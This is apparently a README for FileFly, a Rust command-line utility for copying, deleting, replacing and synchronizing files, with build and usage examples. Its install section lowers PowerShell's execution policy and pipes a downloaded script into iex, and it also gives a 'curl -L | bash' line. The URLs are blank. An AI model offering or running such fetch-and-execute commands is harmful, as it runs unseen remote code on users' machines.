FileFly is a Rust command-line utility for handling file and folder operations such as copying, deleting, replacing, and synchronizing. It provides a simple interface to perform these actions with progress tracking and logging capabilities.
Just run the following two commands with Powershell (not CMD)
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
[System.Net.WebClient]::new().DownloadString('') | iex
curl -L | bash
To directy use FileFly, make sure you have Rust installed. Then, you can build the project using the following command:
cargo build --release
This will create the executable in the target/release
FileFly supports the following commands:
Copy a file or folder from the source to the destination.
filefly copy -s source_path -d destination_path
Delete a file or folder.
filefly delete -f file_or_folder_path
Replace a file or folder with another.
filefly replace -s source_path -d destination_path
Synchronize a file or folder with another.
filefly synchronize -s source_path -d destination_path
Progress Tracking: FileFly displays progress bars for file operations, keeping you informed about the ongoing tasks.
Logging: The utility provides detailed logging, including success, error, and informational messages.
Directory Synchronization: The synchronize command ensures that the source and destination directories are identical by copying missing files and deleting extraneous ones.
filefly copy -s /path/to/source -d /path/to/destination
filefly delete -f /path/to/file_or_folder
filefly replace -s /path/to/source -d /path/to/destination
filefly synchronize -s /path/to/source -d /path/to/destination
Feel free to contribute to FileFly by opening issues or submitting pull requests. Your feedback and improvements are highly appreciated.
This project is licensed under the Apache License - see the LICENSE file for details.